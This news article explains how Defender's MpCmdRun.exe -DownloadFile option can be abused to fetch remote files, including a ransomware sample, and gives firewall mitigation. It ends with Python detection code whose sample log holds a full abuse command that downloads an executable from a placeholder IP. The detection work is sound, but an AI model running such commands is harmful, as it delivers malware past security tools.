Microsoft’s Windows Defender MpCmdRun.exe can be manipulated to download malware


The recently updated MpCmdRun.exe tool in the Windows 10 antivirus can easily be abused to make Windows Defender download malware

Microsoft Defender, aka Windows Defender, has proven to be a hardy anti-virus tool for defending Windows 10 PCs, laptops, and servers from malware, trojans, and other malicious code. After years of neglect, Microsoft put some labor into Windows Defender, retooled it, and renamed it Microsoft Defender. The retooled and renamed Microsoft Defender is now perhaps one of the top anti-malware apps for Windows 10. However, it is not without fault.

It so happens that a recently updated tool in Microsoft Defender can be easily manipulated to make Microsoft Defender itself download malware. Security researcher Mohammad Askar has discovered that the recently updated MpCmdRun.exe command has a backdoor that could be easily manipulated to make the victim's PC, laptop, or server download malicious files from a remote location.

Microsoft has recently released an updated version of the Microsoft Antimalware Service Command Line Utility, also known as MpCmdRun.exe. This process is associated with Microsoft Defender's anti-spyware component and protects the system against Internet threats such as spyware, adware, and trojans. The update adds a new -DownloadFile command-line argument to MpCmdRun.exe. Askar found that he could use this argument to make a Windows 10 device download any remotely stored file.

The new download-file feature in MpCmdRun.exe was added to Microsoft Defender in version 4.18.2007.9 or 4.18.2009.9, and those versions are vulnerable to this abuse. Bleeping Computer used Askar's PoC to download the resources.exe file, the WastedLocker ransomware sample used in a recent Garmin attack.

Thankfully, Microsoft Defender scans files it downloads itself, so it was able to flag the malicious download. It is not known, however, whether other anti-virus software would flag such downloads. The easiest way to prevent this abuse is to block MpCmdRun.exe from connecting to remote locations; IT admins can set up a firewall rule to limit its Internet access.
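Because other products may not flag the download, defenders can also hunt for this behaviour in process-creation telemetry. The following is an added example, not code from the article or from Askar's PoC: it scans constructed sample log lines for MpCmdRun.exe launched with -DownloadFile and pulls out the remote host and destination path. It assumes that -url and -path are the arguments that accompany -DownloadFile (the article names only -DownloadFile), and the log layout and values are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample telemetry (not real logs), in a simplified
# "Image=... CommandLine=..." layout modelled on process-creation events.
SAMPLE_LOG = r"""
Image=C:\Program Files\Windows Defender\MpCmdRun.exe CommandLine="MpCmdRun.exe -SignatureUpdate"
Image=C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.9-0\MpCmdRun.exe CommandLine="MpCmdRun.exe -DownloadFile -url http://203.0.113.10/sample.exe -path C:\Users\Public\sample.exe"
Image=C:\Program Files\Windows Defender\MpCmdRun.exe CommandLine="MpCmdRun.exe -Scan -ScanType 1"
"""

LINE_RE = re.compile(r'Image=(?P<image>.+?) CommandLine="(?P<cmd>.*)"$')
ARG_RE = re.compile(r'"[^"]*"|\S+')  # keeps quoted arguments together


def parse_line(line):
    """Split one log line into (image path, command line), or None."""
    m = LINE_RE.match(line.strip())
    return (m.group("image"), m.group("cmd")) if m else None


def analyse(image, cmd):
    """Return a finding dict if MpCmdRun.exe was run with -DownloadFile.

    Switches are matched case-insensitively. -url and -path are assumed
    to be the arguments that accompany -DownloadFile (not on the page).
    """
    if not image.lower().endswith("mpcmdrun.exe"):
        return None
    tokens = [t.strip('"') for t in ARG_RE.findall(cmd)]
    lowered = [t.lower() for t in tokens]
    if "-downloadfile" not in lowered:
        return None

    def value_after(flag):
        idx = lowered.index(flag) + 1 if flag in lowered else len(tokens)
        return tokens[idx] if idx < len(tokens) else None

    url = value_after("-url")
    return {"image": image, "url": url, "path": value_after("-path"),
            "host": urlparse(url).hostname if url else None}


def scan_log(text):
    """Return all -DownloadFile findings across a block of log lines."""
    findings = []
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed and (finding := analyse(*parsed)):
            findings.append(finding)
    return findings
```

Each finding's host can be compared against the update endpoints Defender legitimately talks to, and the egress firewall rule the article recommends stops the download even when the tool is invoked this way.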

